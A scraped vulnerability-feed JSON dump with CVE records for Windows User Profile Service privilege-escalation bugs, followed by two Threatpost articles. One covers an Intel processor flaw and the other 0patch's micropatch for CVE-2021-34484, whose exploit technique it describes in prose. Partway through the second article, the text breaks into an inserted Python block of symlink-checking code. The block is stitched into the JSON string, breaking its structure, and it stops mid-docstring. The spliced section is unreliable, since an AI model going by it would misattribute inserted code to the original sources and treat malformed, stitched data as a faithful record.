This CVE ID is unique from CVE-2022-21919.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "cve", "title": "CVE-2022-21895", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-05-23T17:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-21895", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21895", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:rt:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-06-14T14:18:50", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-21895.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "cve", "title": "CVE-2022-21919", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-05-23T17:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-21919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21919", "cvss": {"score": 6.9, "vector": 
"AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:rt:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", 
"cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*"]}], "zdi": [{"lastseen": "2023-05-23T15:49:08", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the User Profile Service. By creating a directory junction, an attacker can abuse the service to delete a directory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "zdi", "title": "Microsoft Windows User Profile Service Directory Junction Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-11T00:00:00", "id": "ZDI-21-966", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-966/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-08-16T05:58:16", 
"description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "prion", "title": "CVE-2021-34484", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "id": "PRION:CVE-2021-34484", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T15:43:43", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-21919.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "prion", "title": "CVE-2022-21895", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2022-21895", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-21895", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-15T15:43:48", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-21895.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "prion", "title": "CVE-2022-21919", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2022-21919", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-21919", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-06-14T15:25:12", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", 
"bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-34484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:05:15", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T08:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-01-11T08:00:00", "id": "MS:CVE-2022-21919", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-28T20:41:59", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21919.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T08:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-01-11T08:00:00", "id": "MS:CVE-2022-21895", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21895", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-11-15T21:22:00", "description": "A security vulnerability in Intel chips opens the door for encrypted file access and espionage, plus the ability to bypass copyright 
protection for digital content.\n\nThat\u2019s according to Positive Technologies (PT), which found that the vulnerability (CVE-2021-0146) is a debugging functionality with excessive privileges, which is not protected as it should be.\n\nThe high-severity privilege-escalation issue is rated 7.1 out of 10 on the CVSS vulnerability-severity scale.\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\n\u201c[The] hardware allows activation of test or debug logic at runtime for some Intel processors which may allow an unauthenticated user to potentially enable escalation of privilege via physical access,\u201d according to Intel\u2019s advisory, [issued last week](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html>).\n\nIn terms of scope, the vulnerability affects the Pentium, Celeron and Atom processors of the Apollo Lake, Gemini Lake and Gemini Lake Refresh platforms. These chips power laptops, mobile devices, embedded systems, medical devices and a variety of internet of things (IoT) offerings.\n\n\u201cAccording to a study by Mordor Intelligence, Intel ranks fourth in the IoT chip market, while its Intel Atom E3900 series IoT processors, which also contain the CVE-2021-0146 vulnerability, are used by car manufacturers in more than 30 models, including, according to unofficial sources, in Tesla\u2019s Model 3,\u201d PT noted in a writeup shared with Threatpost.\n\nTo address the issue, users should install the [UEFI BIOS](<https://threatpost.com/intel-security-holes-cpus-bluetooth-security/166747/>) updates published by manufacturers of each piece of electronic equipment. 
The following processor models are affected:\n\nSource: Intel.\n\n## **CVE-2021-0146 Impact for End Users**\n\nWhen it comes to impact, an exploit would allow cybercriminals to extract a device\u2019s encryption key and gain access to information.\n\n\u201cOne example of a real threat is lost or stolen laptops that contain confidential information in encrypted form,\u201d said Mark Ermolov, a PT researcher who was credited with discovering the bug (along with PT\u2019s Dmitry Sklyarov and independent researcher Maxim Goryachy).\n\nThe vulnerability is also dangerous because it facilitates the extraction of the root encryption key used in Intel\u2019s Platform Trust Technology and Enhanced Privacy ID technologies, which are used to protect digital content from illegal copying, Ermolov added.\n\n\u201cFor example, a number of Amazon e-book models use Intel EPID-based protection for digital rights management,\u201d he explained. \u201cUsing this vulnerability, an intruder might extract the root EPID key from a device (e-book), and then, having compromised Intel EPID technology, download electronic materials from providers in file form, copy and distribute them.\u201d\n\nAdditionally, an exploit could allow cyberattackers to conduct targeted attacks across the supply chain, Ermolov noted.\n\n\u201cFor example, an employee of an Intel processor-based device supplier could extract the Intel CSME firmware key and deploy spyware that security software would not detect,\u201d he said.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. 
Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-15T20:52:27", "type": "threatpost", "title": "High-Severity Intel Processor Bug Exposes Encryption Keys", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-15T20:52:27", "id": "THREATPOST:53A062956C31459E2846CD4C959DFD49", "href": "https://threatpost.com/intel-processor-bug-encryption-keys/176355/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:03", "description": "A partially unpatched security bug in Windows that could allow local privilege escalation from a regular user to System remains not fully addressed by Microsoft \u2013 but an unofficial micropatch from 0patch has hit the scene.\n\nThe bug ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) was originally disclosed and patched as part of Microsoft\u2019s [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>). At the time, it was categorized as an arbitrary directory-deletion issue that was considered low-priority because an attacker would need to locally log into the targeted computer to exploit it, which, in theory, would allow the adversary to delete file folders anyway.\n\nHowever, the security researcher who discovered it, Abdelhamid Naceri, [soon uncovered](<https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>) that it could also be used for privilege escalation, which is a whole other ball of wax. 
System-level users have access to resources, databases and servers on other parts of the network.\n\nAbdelhamid also took a look at Microsoft\u2019s original patch, subsequently finding a bypass for it via a simple tweak to the exploit code he had developed, essentially reverting it to zero-day status.\n\n> CVE-2021-34484 bypass as 0day<https://t.co/W0gnYHxJ6B>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [October 22, 2021](<https://twitter.com/KLINIX5/status/1451558296872173577?ref_src=twsrc%5Etfw>)\n\n\u201cThe vulnerability lies in the User Profile Service, specifically in the code responsible for creating a temporary user profile folder in case the user\u2019s original profile folder is damaged or locked for some reason,\u201d explained 0Patch\u2019s Mitja Kolsek in a [Thursday writeup](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) . \u201cAbdelhamid found that the process (executed as Local System) of copying folders and files from user\u2019s original profile folder to the temporary one can be attacked with symbolic links to create attacker-writable folders in a system location from which a subsequently launched system process would load and execute attacker\u2019s DLL.\u201d\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nThe exploit is straightforward: An attacker would create a specially crafted symbolic link (essentially, a shortcut link that points to a specific file or folder), then would need to save it in the temporary user profile folder (C:\\Users\\TEMP).\n\nThen, when the User Profile Service copies a folder from user\u2019s original profile folder as described by Kolsek, the symbolic link will force it to create a folder containing a malicious library (DLL) payload somewhere else where the attacker would normally not 
have permissions to create one.\n\n\u201cMicrosoft, even though believing the vulnerability only allowed for deletion of an arbitrarily \u2018symlinked\u2019 folder, made a conceptually correct fix: it checked whether the destination folder under C:\\Users\\TEMP was a symbolic link, and aborted the operation if so,\u201d explained Kolsek. \u201cThe incompleteness of this fix, as noticed by Abdelhamid, was in the fact that the symbolic link need not be in the upper-most folder (which Microsoft\u2019s fix checked), but in any folder along the destination path.\u201d\n\nThe micropatch fixes this by extending the security check for symbolic links to the entire destination path by calling the \u201cGetFinalPathNameByHandle\u201d function.\n\nIt should be noted that a workable exploit also requires attackers to be able to win a race condition (with unlimited attempts) since the system will be attempting to perform two operations (one malicious, one legitimate) at the same time. Also, even though Abdelhamid said that \u201cit might be possible to [exploit] without knowing someone [else\u2019s] password,\u201d so far, having user credentials for the targeted computer remains an obstacle, Kolsek noted.\n\nThe bug affects Windows 10 (both 32 and 64 bit), versions v21H1, v20H2, v2004 and v1909; and Windows Server 2019 64 bit.\n\nMicrosoft hasn\u2019t released a timeline for updating its official patch and didn\u2019t immediately respond to a request for comment.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. 
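The defect Kolsek describes above, and the directory-junction abuse in the ZDI advisory earlier on this page, both come down to one question: does the destination path the service is about to operate on as Local System contain a symbolic link or junction anywhere along it, or only at the first level under the temporary profile root? The following is an added example, not code from the page, from Microsoft or from 0patch, that models the two checks in Python on a constructed directory tree: `top_level_only_check` behaves like the incomplete fix (only the upper-most folder is tested), `any_component_check` walks every element of the path, and `escapes_base` resolves the final on-disk path, which is the role the page says `GetFinalPathNameByHandle` plays in the micropatch. The folder names (`Users/TEMP`, `Windows/System32`, `AppData/Local`) are stand-ins for the Windows layout and are assumptions; on Windows the same logic would have to treat NTFS junctions as well as symlinks, which Python only reports via `os.path.isjunction` on 3.12 and later.

```python
"""Path-validation check behind the incomplete CVE-2021-34484 fix.

Added example, not code from the page, from Microsoft or from 0patch.
It models the defect Kolsek describes: a check that only tests the
top-level folder under the temporary profile root for a symbolic link,
versus a check that inspects every component of the destination path
(what the micropatch's GetFinalPathNameByHandle call achieves on Windows).
The directory names below are a constructed stand-in for C:\\Users\\TEMP
and a system location; no real Windows layout is required.
"""
import os
import tempfile
from pathlib import Path


def _is_redirect(path: str) -> bool:
    """True if `path` is a symlink, or an NTFS junction where Python can tell."""
    if os.path.islink(path):
        return True
    isjunction = getattr(os.path, "isjunction", None)  # Python 3.12+ only
    return bool(isjunction and isjunction(path))


def top_level_only_check(base: str, dest_rel: str) -> bool:
    """The incomplete check: only the first path element under `base` is
    tested, so a link planted deeper in the path is never seen."""
    first = Path(dest_rel).parts[0]
    return _is_redirect(os.path.join(base, first))


def any_component_check(base: str, dest_rel: str) -> bool:
    """Walk base/dest_rel one element at a time and reject on the first
    symlink or junction encountered anywhere along the path."""
    current = base
    for part in Path(dest_rel).parts:
        current = os.path.join(current, part)
        if _is_redirect(current):
            return True
    return False


def escapes_base(base: str, dest_rel: str) -> bool:
    """Resolve the final on-disk path (the role GetFinalPathNameByHandle
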